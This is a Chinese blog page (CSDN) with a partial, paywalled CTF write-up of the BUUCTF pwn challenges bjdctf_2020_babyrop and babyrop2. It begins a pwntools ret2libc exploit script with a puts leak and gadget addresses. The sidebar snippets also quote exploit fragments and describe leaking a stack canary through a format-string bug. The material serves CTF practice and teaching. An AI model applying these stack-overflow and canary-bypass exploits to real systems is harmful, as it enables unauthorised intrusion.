bjdctf_2020_babyrop 与bjdctf_2020_babyrop2(格式化字符leak)

最新推荐文章于 2022-08-31 18:54:36 发布
VIP文章 最新推荐文章于 2022-08-31 18:54:36 发布
阅读量423 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/beaster1/article/details/115384305
版权

bjdctf_2020_babyrop

先checksec

在这里插入图片描述
打开ida正常查看函数

在这里插入图片描述打开init函数发现puts函数

在这里插入图片描述然后进入vuln函数 存在栈溢出
在这里插入图片描述
没有看到后门函数应该是libc leak+rop
代码如下

from pwn import*
from LibcSearcher import*
p=remote('node3.buuoj.cn',29901)
#p=process('')
elf=ELF('bjdctf_2020_babyrop')
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
pop_rdi=0x400733
pop_rsi=0x400731
main=0x4006ad
payload='a'*0x28+p64(pop_rdi)+
最低0.47元/天 解锁文章
zeeeroo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
rOpbaby-CTFPWN ROP练习题
08-21
DefConCTF 2015 Quals CTFPWN ROP练习题 可用于练习基础的ROP
【CTF】bjdctf_2020_babyrop
凉水的博客
06-18 673
bjdctf_2020_babyrop
bjdctf_2020_babyrop2
、moddemod
07-06 566
注意这题开启了Canary 因为限制了payload长度就不可以写got表了,但是可以直接泄露Canary值,在vuln中进行栈溢出即可拿到shell… exp from pwn import * from LibcSearcher import * context.log_level = 'debug' proc_name = './bjdctf_2020_babyrop2' elf = ELF(proc_name) p = process(proc_name) p = remote('node3..
bjdctf2020 babyrop
pondzhang的专栏
05-09 287
from pwn import * p = process('./bjdctf_2020_babyrop') libcelf = ELF('./libc-2.23.so') pop_rdi_ret = 0x0000000000400733 pop_rsi_r15_ret = 0x0000000000400731 pltputs = 0x00000000004004E0 main = 0x00000000004006AD gotputs = 0x0000000000601018 payload = 'a' *
buuctf bjdctf_2020_babyrop
carol2358的博客
05-02 423
常规libc 64位 from pwn import * from LibcSearcher import * local_file = './bjdctf_2020_babyrop' local_libc = '/lib/x86_64-linux-gnu/libc-2.23.so' remote_libc = './libc-2.23.so' select = 1 if sel...
Memory_and_Exception_Trace.zip_memory leak_trace
09-24
C++ memory leak detection and exception
C_Language_Programming_under_Linux_memory_leak_Res_linux_linux
07-15
Linux下C语言程序内存泄漏的研究,阐述了内存泄漏的概念,危害,和常发场景,并给出查找内存泄漏的方法
mmr.zip_game_restart
09-20
minecraft server Restart when memory leak
data-le.zip_Data lwak_zip
09-24
Data leak system php
EFEKTA_WATER_LEAK_SENSOR
05-23
专业版使用2 / AA(14250)电池(1200mA)运行。 小版本使用cr2032电池(200mA)运行。 使用MySensors库 不要捐赠给我,它在这个世界上行不通: : ,只需购买: 有关更多信息,请访问 联络人: 视频(标准版)...
bjdctf_2020_babyrop
u014377094的博客
01-25 904
新手向解释
【BUUCTF】bjdctf_2020_babyrop2
m0_51251108的博客
12-30 337
【BUUCTF】bjdctf_2020_babyrop2 有canary ida看下程序 有格式化漏洞,但有6格宽度限制 有栈溢出 思路:这题靠格式化字符串漏洞泄露出canary的地址 然后栈溢出,ret2libc 泄露方法: 一次一次试过去,找到我们输入的位置的偏移 然后这题里偏移+1就是canary了 然后就能把canary带出来,canary每次运行都不一样 所以要实时接收 一个程序不同函数的canary好像都相同 特别提醒自己在接收环节的处理 exp: from pwn import*
[CTF]bjdctf_2020_babyrop2
m0_50819561的博客
10-07 383
格式化字符串漏洞+金丝雀绕过。 出现这种形式的,v2就是canary。 查看他在栈里的位置。 var_8就是canary。 利用格式化字符串漏洞。 %6$p表示输出第六个参数。 发现我们输入的东西在第六个参数的位置。 调试之后发现有一串随机的十六进制数字。这就是canary。由此可见,这个canary在第七个参数的位置。 于是我们先用格式话字符串泄露第七个参数位置上的内容,每一次进行栈溢出的时候把泄露出来的值填入即可。 代码如下: from pwn import * from LibcSearche
pwn7第七关
qq_18823653的博客
04-03 381
前面几个懒得写了,直接第七个吧,溢出点和前面一样get()函数,112字节,保护只开了NX程序本身没有system(),也没有/bin/sh,且栈不可执行,用ROPgadget也没找到有用的语句,但是程序是动态链接的,运行时会加载so库,可以用put()泄露出put的真实地址,又因为ASLR随机化不了地址底12位,可以用put真实地址的底12位查询加载的那个版本的libc.so,以及确定libc的...
[PWN] BUUCTF bjdctf_2020_babyrop
空城惜梦的博客
06-04 409
构造常规的ROP链,三种找到libc版本的方法分析寻找libc版本1.利用LibcSearcher来查找libc版本payload2.通过特殊网址来查找libc版本3.通过gdb来查找libc版本payload 分析 按照惯例checksce ,发现开了NX和RELRO 运行程序,查看程序的运行逻辑,从图中的红框可以猜测是一道泄露libc的题目 接着用IDA查看程序中主要函数存在的漏洞,可以看到 buf这个字符串数组只有0x20字节,而read却可以读取0x64个字节,所以这里存在着栈溢出 shift
bjdctf_2020_babyrop【BUUCTF】
qq_41696518的博客
08-31 308
bjdctf_2020_babyrop
resource_leak
最新发布
08-04
引用[2]中提到了一个资源泄露检查器(RESOURCE_LEAK checker),它可以检查只通过本地变量引用的资源泄露。它会检查程序中返回资源的方法以及可以关闭或释放传入资源的方法。但是它不会跟踪存储到对象字段中的资源。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值